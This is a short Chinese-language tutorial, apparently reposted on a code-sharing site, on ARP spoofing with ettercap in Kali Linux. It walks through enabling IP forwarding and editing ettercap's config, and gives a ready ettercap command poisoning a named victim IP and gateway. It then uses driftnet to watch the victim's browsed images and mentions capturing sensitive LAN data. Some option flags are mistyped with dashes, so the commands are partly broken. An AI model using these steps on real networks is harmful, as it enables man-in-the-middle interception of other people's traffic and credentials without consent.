如何使用kali中的ettercap實現ARP欺騙


1.首先需要對kali中的ettercap進行配置;

配置文件為:/etc/ettercap/etter.conf

(1)首先需要將NetworkManager的配置文件進行修改;

vi /etc/NetworkManager/NetworkManager.conf

image

image

將其中的false修改為true,如下:

[ifupdown]

managed=true

(2)重啟服務

service network-manager restart

2.配置ettercap的配置文件

vim /etc/ettercap/etter.conf

(1)修改ec_gid和ec_gid的值為0

image

(2)找到linux分類下的if you use iptables這一行,打開轉發。

image

3.查看系統啟動時ip_forward參數,並修改為1

cat /proc/sys/net/ipv4/ip_forward

echo 1 >>/proc/sys/net/ipv4/ip_forward

image

至此,IP轉發功能已開啟完畢。

4.使用ettercap進行arp欺騙

(1)ettercap –i –eth0 –Tq –M arp:remote/ip(host)//net gatemask/

如:ettercap –i eth0 –Tq –M arp:remote/192.168.3.26//192.168.3.1/

-i  后面跟的是連接局域網的網卡;

-M 后面跟的是指定使用arp的方式;

-Tq T指的是text文本模式,q指的是安靜模式執行這個命令;(quiet)

remote后面的IP地址:

第一個IP地址是:指定要嗅探的局域網的IP地址

第二個IP地址是:網關地址

如果需要嗅探該局域網的所有地址,那么第一個IP地址為空即可。

image

鍵入”h”,查看幫助信息:

image

l

輸出主機列表;

5.如何驗證arp欺騙是否成功——使用driftnet(網絡圖片嗅探工具)來測試。

driftnet -i eth0          ……會打開一個窗口顯示主機瀏覽的圖片  -i參數為指定監聽的網卡

plus:

如果提示失敗,未找到命令,安裝一下即可。

apt-get install driftnet

6.ettercap也可以抓取局域網內的敏感信息


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM